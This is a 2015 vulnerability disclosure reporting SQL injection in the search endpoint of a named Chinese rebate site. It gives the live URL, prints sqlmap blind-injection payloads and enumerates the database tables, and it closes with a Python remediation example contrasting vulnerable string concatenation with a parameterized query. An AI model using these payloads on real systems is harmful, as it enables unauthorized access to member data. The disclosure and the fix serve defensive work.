
SQL injection in a 试客联盟 (shikee.com) 众用助手 helper site endpoint exposes 45W (450,000) member records

2015-10-21 01:10

Vulnerable URL:

http://zhelp.shikee.com/home/search?keyword=a



The keyword parameter is injectable:

---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=a%' AND 4924=4924 AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyword=a%' AND (SELECT * FROM (SELECT(SLEEP(5)))yxoY) AND '%'='
---
[14:05:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.10
back-end DBMS: MySQL 5.0.12

Proof of vulnerability:

Databases:

available databases [2]:
[*] information_schema
[*] zhongyongapp





45W+ (450,000+) member records exposed

Database: zhongyongapp
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mobile_app_subsidy_apply_period | 9189697 |
| mobile_app_subsidy_apply_log | 7700434 |
| mobile_user_message | 5847387 |
| mobile_system_log_hlpay | 3023412 |
| mobile_app_subsidy_apply | 1956328 |
| mobile_app_downlog | 1316216 |
| mobile_app_subsidy_apply_step | 778630 |
| mobile_app_subsidy_rebates_pay | 778431 |
| mobile_members20150601 | 386149 |
| mobile_app_task_apply_log | 237048 |
| mobile_user_sign_log | 171401 |
| mobile_user_device | 149860 |
| mobile_user | 89294 |
| mobile_app_task_user_share_score | 84091 |
| mobile_user_invite_reward | 79963 |
| mobile_app_img | 67865 |
| mobile_system_subsidy | 62898 |
| mobile_system_subsidy_history | 61087 |
| mobile_app_task_apply | 54780 |
| mobile_app_task_rebates_pay | 33704 |
| mobile_user_invite | 31018 |
| mobile_system_task | 19270 |
| mobile_admin_log | 15890 |
| mobile_app_log | 15181 |
| mobile_system_task_log | 15129 |
| mobile_sql_log | 15104 |
| mobile_task_xls | 13879 |
| mobile_app | 13860 |
| mobile_user_sign | 13744 |
| mobile_app_collection | 8038 |
| mobile_user_comment | 7006 |
| mobile_app_subsidy_log | 4699 |
| mobile_user_suggest | 4606 |
| mobile_app_subsidy_period | 3594 |
| mobile_app_subsidy_finance | 3003 |
| mobile_app_task_log | 1896 |
| mobile_user_first_reward | 1596 |
| mobile_user_extend | 1593 |
| mobile_app_task | 1157 |
| mobile_app_subsidy | 1004 |
| mobile_task_pay | 734 |
| mobile_finance_log | 643 |
| mobile_user_open | 472 |
| mobile_app_subsidy_append | 467 |
| mobile_user_freeze_log | 382 |
| mobile_app_special_apply | 375 |
| mobile_task_img | 348 |
| mobile_app_task_option | 308 |
| mobile_app_category | 150 |
| mobile_message_board | 119 |
| mobile_task_extend | 74 |
| mobile_rebate_failure_log | 65 |
| mobile_help_img | 39 |
| mobile_system_config | 37 |
| mobile_app_special | 36 |
| mobile_common_session | 25 |
| mobile_help_category | 24 |
| mobile_help | 20 |
| mobile_web_home_advertisement | 19 |
| mobile_app_home_advertisement | 12 |
| mobile_app_task_apply_timeout_log | 1 |
+---------------------------------------+---------+



Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1285 |
| SESSION_VARIABLES | 445 |
| GLOBAL_VARIABLES | 431 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| STATISTICS | 138 |
| PARTITIONS | 128 |
| TABLES | 128 |
| KEY_COLUMN_USAGE | 92 |
| TABLE_CONSTRAINTS | 85 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| PROCESSLIST | 23 |
| SCHEMA_PRIVILEGES | 18 |
| PARAMETERS | 11 |
| ENGINES | 9 |
| REFERENTIAL_CONSTRAINTS | 3 |
| ROUTINES | 3 |
| SCHEMATA | 2 |
| TRIGGERS | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+



[screenshot: 1.png]



Remediation:
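The payloads in the sqlmap output above imply that `keyword` is concatenated straight into a `LIKE '%...%'` clause. The snippet below is an added example, not code from the report or from the site: it places that concatenation pattern beside a parameterized, wildcard-escaped version and uses the report's own boolean payload (plus its "false" twin) as a regression check that the fixed search no longer answers the two states differently. The `mobile_user` table and usernames are constructed, and SQLite stands in for the PHP/MySQL stack, where the equivalent fix is a PDO or mysqli prepared statement.

```python
import re
import sqlite3

# Constructed sample data standing in for the site's member table; names are made up.
SAMPLE_USERS = ["alice", "bob", "carol", "dave"]

def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL backend; table name mirrors the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mobile_user (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO mobile_user (username) VALUES (?)",
                     [(u,) for u in SAMPLE_USERS])
    return conn

def search_vulnerable(conn: sqlite3.Connection, keyword: str) -> list:
    """The pattern the report's payload implies: the raw keyword is concatenated into
    LIKE '%...%', so a single quote in it closes the literal and the rest is parsed as SQL."""
    sql = f"SELECT username FROM mobile_user WHERE username LIKE '%{keyword}%'"
    return [row[0] for row in conn.execute(sql)]

def escape_like(value: str, esc: str = "\\") -> str:
    """Escape LIKE metacharacters so user input cannot inject wildcards into the pattern."""
    return re.sub(r"([%_\\])", lambda m: esc + m.group(1), value)

def search_fixed(conn: sqlite3.Connection, keyword: str) -> list:
    """Hardened form: the keyword is a bound parameter (data, never parsed as SQL) and
    its wildcards are escaped, so only the literal text the user typed is matched."""
    pattern = "%" + escape_like(keyword) + "%"
    rows = conn.execute(
        "SELECT username FROM mobile_user WHERE username LIKE ? ESCAPE '\\'", (pattern,))
    return [row[0] for row in rows]

# The report's boolean-based payload and its "false" twin: the two responses sqlmap
# compares. A fixed endpoint must answer both identically (here: no rows at all).
PAYLOAD_TRUE = "a%' AND 4924=4924 AND '%'='"
PAYLOAD_FALSE = "a%' AND 4924=4925 AND '%'='"

def demo() -> dict:
    """Run both searches against both payload states; used as a regression check."""
    conn = make_db()
    return {
        "vuln_true": search_vulnerable(conn, PAYLOAD_TRUE),    # same rows as keyword=a
        "vuln_false": search_vulnerable(conn, PAYLOAD_FALSE),  # no rows: the leak channel
        "fixed_true": search_fixed(conn, PAYLOAD_TRUE),
        "fixed_false": search_fixed(conn, PAYLOAD_FALSE),
        "fixed_plain": search_fixed(conn, "a"),
    }
```

The difference between `vuln_true` and `vuln_false` is exactly the one-bit oracle sqlmap used to enumerate the databases above; the fixed search returns the same empty result for both while still matching the plain keyword.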

Source: www.wooyun.org/bugs/wooyun-2015-0146950
